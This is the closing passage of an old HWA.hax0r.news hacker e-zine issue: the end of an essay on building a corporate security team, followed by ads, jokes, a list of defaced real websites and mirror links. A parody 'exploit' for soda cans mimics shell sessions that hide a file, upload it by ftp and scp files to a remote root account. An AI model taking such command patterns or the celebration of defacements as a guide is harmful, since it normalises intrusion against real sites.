     not, most of what constitutes good security practices can be described as 
     common sense! But, for those readers who have gotten used to my bullet 
     lists in the above paragraphs, selling security to users is best 
     accomplished by: 

     - Maintaining open communications with your users. Don't just throw
     together a website containing security information. Make sure that site is
     regularly updated (giving users a reason to revisit the site), and users
     not only have a way to contact the security group, but that the
     security group contacts the user community with important information
     through the use of timed e-mail announcements, columns in company
     newsletters, and other awareness material promulgated throughout the
     corporation. Above all, never be afraid to listen to your users. Be
     approachable and never remain on your "pedestal" behind the locked doors
     of the security office.

     - Being proactive in security awareness. While you may not use America
     Online at the office, it is a good bet many of your employees do. Should
     your security group learn of a vulnerability in the AOL software, pass it
     on to your user base as "for your information" material. This
     demonstrates a level of concern for your users' security posture beyond the
     perimeter of your corporate castle. If users feel that you are looking out
     for their "cyber-safety" as well as that of the corporation, user support
     for security procedures will grow exponentially. At the House, I went on
     "the offensive" in gathering intelligence on the threats to our
     information resources. By attaining the widest and most detailed "Big
     Picture" of the threats facing your organization you will be better
     equipped to prepare for and respond to such threats.

     - Making security transparent. Yes, it may make your system "iron-clad" to
     require twenty passwords, fingerprint identification on the workstations,
     DNA codes to check electronic mail, retinal scans, and requiring the user
     to sing the first verse of "America The Beautiful" to log into the
     corporate network, but you will pay a substantial price not only in
     equipment to process such personal identification, but in employee support
     and willingness to comply with a security program that has more
     requirements for logging into a computer than for getting a backstage pass
     at a Hanson concert. This leads to employees skirting security, writing
     down (or sharing) their passwords with others or leaving their computers
     logged in after close of business. Security must not place unnecessary
     burdens on the employees, and it does not have to in order to provide
     adequate security. In particular, strong passwords and the logging of all
     system activity is a good place to start for most organizations.
     Naturally, special situations (such as needing dial-in access or access to
     sensitive networks) require additional security, but that is "part and
     parcel" of the added requirements the employee has in accepting his
     responsibilities that force him/her to access such systems.

     - Insuring people know their responsibilities. Nothing is worse than
     finding out that your mission-critical systems administrator didn't know
     that he/she was responsible for securing that e-mail server. Building
     security knowledge into every job description and insuring managers at
     all levels know their security roles and responsibilities will further
     support the security culture you are attempting to create.

     PMA 3 

     Is it "doable"? 

     The million-dollar question that I don't know the answer to. You will,
     after several hours of meetings and group soul-searching as to the
     effectiveness of your security program. A proper information security
     program should not place unnecessary burdens on the employees, be
     cost-prohibitive to the company, or confusing to those who administer it.
     Are your policies, standards, incident response call-out rosters and
     procedures known by those who need to know? Are they understandable and
     available for anyone to reference, or are your security policies and
     procedures dusting away on an obscure bookshelf? Is there too much
     bureaucracy? Are policies and procedures poorly written and thus ignored or
     unknown to your users? Do your users seem confused? Have you had incidents
     resulting from any of these shortcomings? If the answer to any of these
     questions is "yes" you need to examine the levels of complexity of your
     security program.

     The military concept of unity of command is a key element in answering
     this question. Ideally, the information security group should not be placed
     within the operations staff of a company's information resources group.
     Rather, it should be placed as a special office with a direct link to
     the corporate Chief Information Officer (or higher) where it is not
     burdened with layers of administrative and operational bureaucracy. In
     Washington, as elsewhere in the world, how well you are perceived and paid
     attention to depends greatly on Where You Sit within the organization.

     Again, I reflect on my activities at the US House of Representatives. The
     Information Security Program Office was located immediately under the
     Chief Information Officer at the division level, right alongside the five
     other line departments within the House Information Resources
     organization. This allowed the Security Group senior-level access across
     the entire IT organization while providing a clear, unfettered, line of
     communication to the Chief Information Officer and other House offices on
     sensitive issues. This level of interaction among the various division
     managers fostered a very cooperative spirit between the Security Team and
     the other divisions. Now as I work for a major Internet Services company,
     my team (the Corporate Security Group) reports to the Chief Technology
     Officer, and through him, the CEO, and the results are the same: being
     positioned at this level greatly facilitates interaction with other senior
     managers and across the various departments and business units, and allows
     the security group to accomplish its mission. Unfortunately, in too many
     environments, the security staff is located deep within the network services
     department, which effectively bars it from fulfilling its enterprise-level
     responsibilities and visibility as anything more than a "computer support"
     office. The security group must also be free to interact with various
     external organizations (ranging from law enforcement to other security
     teams and divisions within the company) without having to receive constant
     approval from many layers of upper bureaucracy. As mentioned, information
     travels very quickly, and the threats to such information affect companies
     even quicker. The security group must be free to ascertain an incident,
     call in the appropriate personnel, perform "cyber-triage" and work with
     other systems staff and organizations to resolve the situation without
     having to ask "May I?" to non-technical (read: "clueless") management
     every step of the way [3].

     Your security group's freedom to operate more autonomously than other
     offices in your company depends completely on how well you have cemented
     your relationship with both senior management and your fellow division
     chiefs and their staffs. Nothing is worse than receiving a pager call
     and assembling your response team to discover that the systems people
     responsible for the system under attack have ignored your call for help or
     are not as committed to near-real-time incident response as your security
     team is. The commitment of other system administrators and other technical
     staff to participating in a cohesive (proactive and reactive) security
     activity depends greatly on how you interact with them during non-crises.
     Remember what was mentioned above -- You are human, do NOT know it all, and
     above all, need the help of people outside your group to effectively run a
     security program. Being aloof and "untouchable" will only deny you the
     support you need in running a security program. Support others when they
     need it, and they will support you when you need it (and your job is on
     the line!)

     So, is it doable? It is if you have a team. Personally, I would rather
     take technically qualified folks who are first and foremost team players
     and turn them into a high-performance team of security professionals than
     lead a group of security professionals who can't be a team.

     [3] Such latitude is usually given the security group after the upper
     management has grown to respect the security team through its past
     performance in the organization. The hard part is earning that level of
     respect that provides you that level of operational autonomy.

     Conclusions 

     Hopefully, at this point in the article, you have learned some "insider
     tips" and lessons learned about how to develop and maintain a
     high-performance information security organization. If not, you're out of
     luck until the next issue. It's not that difficult, really. You have
     been forewarned about the two key challenges to your security program:
     Selling it to Management and Selling it to Users. Keeping your "doability"
     factor in mind will facilitate both activities -- and believe me, they are
     tough sales! Evaluating the simplicity of your program will illuminate the
     potential bottlenecks and barriers to successful security postures and
     awareness within your organization. May you go forth and protect your
     information resources armed with the knowledge of today and the foresight
     of tomorrow. Thus endeth the sermon.
     
     @HWA
     
     

         

                                                                                 
      -=----------=-         -=----------=-        -=----------=-       -=----------=- 
                                           
                                             0                                     
                                             0                                     
                                             0
                                             o
                                           O O O   
                                             0
                                                                     
                                                                                  
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
         
            
                                HWA.hax0r.news  
     
     
     
     
     
AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************      
              
 
 
       When people ask you "Who is Kevin Mitnick?" do you have an answer? 
 
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       http://www.2600.com/  http://www.kevinmitnick.com
       
       
       +-----------------------------------------------------------------------------+
       | SmoG Alert ..           http://smog.cjb.net/        NEWS on SCIENCE         |
       | ===================     http://smog.cjb.net/        NEWS on SECURITY        |
       | NEWS/NEWS/NEWS/NEWS     http://smog.cjb.net/        NEWS on THE NET         |
       |                         http://smog.cjb.net/        NEWS on TECHNOLOGY      |
       +-----------------------------------------------------------------------------+
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
       *  http://www.csoft.net" One of our sponsors, visit them now  www.csoft.net   * 
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press.usmc.net, put AD! in the subject header please. - Ed    //
      //////////////////////////////////////////////////////////////////////////////


     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*
     
      Send in submissions for this section please! ............c'mon, you KNOW you
      wanna...yeah you do...make it fresh and new...be famous...<sic>
      
        ____                 _ _                                 _             _ _
       / ___|  ___ _ __   __| (_)_ __  _   _  ___  _   _ _ __   / \   ___  ___(_|_)
       \___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | |
        ___) |  __/ | | | (_| | | | | | |_| | (_) | |_| | |   / ___ \\__ \ (__| | |
       |____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_|  /_/   \_\___/\___|_|_|
                                       |___/      
                                 / \   _ __| |_
                                / _ \ | '__| __|
                               / ___ \| |  | |_
                              /_/   \_\_|   \__| TOO, for inclusion in future issues
                              
       Do the HWA logo etc and we'll showcase it here to show off your talents...remember
       the 80's? dig out those ascii editors and do yer best...                       
      
                                               _|
                           _|_|_|    _|_|    _|_|_|_|
                         _|    _|  _|    _|    _|
                         _|    _|  _|    _|    _|
                           _|_|_|    _|_|        _|_|
                               _|
                           _|_|
                                                _|      _|_|
                _|  _|_|    _|_|      _|_|    _|_|_|_|      _|
                _|_|      _|    _|  _|    _|    _|      _|_|
                _|        _|    _|  _|    _|    _|
                _|          _|_|      _|_|        _|_|  _|
                
                
                
                      
                      
      
                                       _________________________
                              /|  /|  |                         |
                              ||__||  |  HAX0R FOR HIRE ...     |
                             /   O O\__                         |
                            /          \ WILL HACK FOR NETWORK  |
                           /      \     \     ACCESS!           |
                          /   _    \     \ ---------------------
                         /    |\____\     \     ||
                        /     | | | |\____/     ||
                       /       \|_|_|/   |    __||
                      /  /  \            |____| ||
                     /   |   | /|        |      --|
                     |   |   |//         |____  --|
              * _    |  |_|_|_|          |     \-/
           *-- _--\ _ \     //           |
             /  _     \\ _ //   |        /
           *  /   \_ /- | -     |       |
             *      ___ c_c_c_C/ \C_c_c_c____________   _________
           
      

       (Ascii art from V0iD magazine #7)         

       Contributed by VeRtIgO (who did the .avi included in this week's .zip file)
       
                   [19:43] <VeRtIg0> Bill Gates is the Antichrist
                   * Revelation 13:18 says:
                   *
                   *    Here is wisdom. Let him who has understanding calculate the
                   *    number of the beast, for it is the number of a man: His
                   *    number is 666.
                   
                           The real name of the Bill Gates is William Henry Gates III.
                           Nowadays he is known as Bill Gates (III), where "III" means
                           the order of third (3rd.)
                   
                           By converting the letters of his current name to the ASCII-
                           values (which are used in computers) you will get the
                           following:
                   
                           B    I    L    L    G    A    T    E    S    3
                   
                           66 + 73 + 76 + 76 + 71 + 65 + 84 + 69 + 83 + 3 = 666
                                                                            """
                           
       -----------------------------------------------------------------------------------------
       
       Amusing Opcodes

       BNE - Branch to Non-Existent code 
       BNR - Branch for No Reason. 
       BRA - Branch to Random Address 
       BVS - Branch to Virtual Subroutine 
       CLD - CalL a Doctor 
       CMD - Create Meaningless Data. 
       DEC - DElete the Code 
       DRA - Decrement Random Address. 
       EDR - Emit Deadly Radiation. 
       JMP - Jump if Memory Present (conditional jump) 
       LLI - Lose Last Instruction. 
       PRS - Push Results off Stack. 
       RIS - Remain In Subroutine. 
       RTI - Return from the Infinity 
       SHB - Scramble High order Bit. 
       TEC - Take Extra time for Calculation.                            


       -----------------------------------------------------------------------------------------
       
       
       
       Remote exploit for Pepsi and Coke cans
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       http://packetstorm.securify.com/ 
       
       -----BEGIN PGP SIGNED HUMOR-----
            Hash: SHA1
      
      It seems cans of Pepsi and Diet Pepsi have
      a possible remote root problem on them.
      
      While recently eyeing a can of coke while
      sitting on my terminal I noticed that I could
      actually drink from it while standing at a
      distance of at least 3 feet.
      
      The sploit:
      
      Now when I first did this I was amazed and had
      to have a couple friends test it out before I
      submitted it so here it is...
      
      <beginpheer>
      ssh root@box.of.straws
      password ********
      
      login denied
      
      ssh root@box.of.dixie.straws
      password ********
      
      Welcome to Dixie Straws
      
      #[skr1ptkid@dixie.straw]su
      [s/key 99 xp03r33t]
      
      #[skr1ptkid@dixie.straw]skey 99 xp03r337
      Enter secret password:
      
      DONT REWT THIS BOXN PLSE
      #[skr1ptkid@dixie.straw]su
      [s/key 99 xp03r33t]
      Response:DONT REWT THIS BOXN PLSE
      
      #
      #
      #cat straw straw straw straw >> super.straw
      #mv superstraw ~/.superstraw *note... had to rename as .superstraw to hide
      from a normal ls*
      #
      #cd ~
      #ftp can.of.coke
      #(username) anonymous
      #(password) mike@hunt.com *note uberleet alias*
      #prompt
      #mput ~/.superstraw
      #quit
      
      ================================================
      
      Now there is no known resolution to this problem as of yet,
      but I will be working to ensure that no one else remotely
      close to my can of coke can root it.
      
      Temporary fix:
      I personally suggest something along these lines of
      security.
      
      ===================================================
      # !/dev/mouth
      # sil@antioffline.com
      # securepep.sh
      
      PATH=/dev/
      
      echo SecurePep.v1
      /bin/tar -cf saliva.tar ~/mouth/*
      scp saliva.tar root@can.of.coke:/;
      tar -xvf saliva.tar
      
      echo Now no one wants to drink any
      
      ===================================================
      
      Now this obviously has been done for fun, so cheers
      to those who enjoy a laugh and a big =P to those
      who don't... You only live once ;)
      
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Yours Truly
      Sil of AntiOffline
      sil@antioffline.com     http://www.antioffline.com
      mirrors: http://psyk0tik.mifits.org || http://xp0rnstar.self-evident.com
      sil@macroshaft.org      http://www.macroshaft.org
      mirrors: http://total.misfits.org
      sil@self-evident.com    http://www.self-evident.com
      
      
      "Windows -- "When do you want to reboot today?""
      
      ID 0x1281EC4F
      DH/DSS
      4096/1024
      CIPHER: CAST
      PGP Fingerprint
      46C0 6A83 E6D2 FEA6 383A  B9A6 44D3 4E77 1281 EC4F
      
      iQA/AwUBN6d/aETTTncSgexPEQLuAgCfRF5dpZii9yEPnqZ+F+
      AEbzB+KL0An3mXPk+Y8lZxkr0crgw72zPX5w71=tCpK
      -----END PGP SIGNATURE-----


       -


      
     @HWA
       
       
       
 SITE.1 
 
      http://www.cs.unm.edu/~dlchao/flake/doom/
      
      http://www.geocities.com/doomhack/
      
      These are a couple of weird sites; what they purport to be is a Doom
      <> Back Orifice interface where PIDs on the host machine are represented
      in DOOM as monsters: kill the monster and BO kills the PID on the host 
      machine. Strange? Sure is. Found this while sifting through the cDc q&a 
      session responses... someone was really bored when they came up with 
      this idea!
 
      
      You can Send in submissions for this section too if you've found 
      (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
      ~~~~~~~~~~~~~~~~

      Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while; for those following their saga, visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as the
      channel name, others aren't so obvious but do exist.
      
      

      US Army Reserve Command (www.usarc.army.mil) 
      Yukon Territories Government (www.gov.yk.ca) 
      Bexon (bexon.com) 
      Utad (PT) (ermelo.utad.pt) 
      Alper Brandon (www.alperbrandon.com) 
      Auto Body World (www.autobodyworld.com) 
      Catering Net (UK) (www.cateringnet.co.uk) 
      Cleveland Ohio (www.cleveland.oh.us) 
      GAA (IE) (www.gaa.ie) 
      Monkey Army (www.monkeyarmy.com) 
      The Renaissance (www.therenaissance.org) 
      USBBOG Edu (CO) (www.usbbog.edu.co) 
      Zeronet (AU) (www.zeronet.com.au) 
      Inca Tek (www.incatek.com) 
      Crayon Rouge (www.crayonrouge.com) 
      Blaklocks Flickan (NU) (www.blaklocksflickan.nu)  
      



           
      and more sites at the attrition cracked web sites mirror:
                   
                    http://www.attrition.org/mirror/attrition/index.html 

       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________



  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://bewoner.dma.be/cum/              
      
      Brasil........: http://www.psynet.net/ka0z              
            
                      http://www.elementais.cjb.net           
            
      Canada .......: http://www.hackcanada.com
      Croatia.......: http://security.monitor.hr
      
      Columbia......: http://www.cascabel.8m.com              
      
                      http://www.intrusos.cjb.net                                   
                      
      Finland ........http://hackunlimited.com/                
                      
      Germany ........http://www.alldas.de/
                      http://www.security-news.com/
      
      Indonesia.....: http://www.k-elektronik.org/index2.html 
      
                      http://members.xoom.com/neblonica/      
      
                      http://hackerlink.or.id/                
      
      Netherlands...: http://security.pine.nl/                
      
      Russia........: http://www.tsu.ru/~eugene/              
      
      Singapore.....: http://www.icepoint.com                 
      
      South Africa ...http://www.hackers.co.za       
                      http://www.hack.co.za            
                      http://www.posthuman.za.net 
 
                      
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? email it to hwa@press.usmc.net and i'll
    review it and post it here if it merits it.

    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

     1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]    


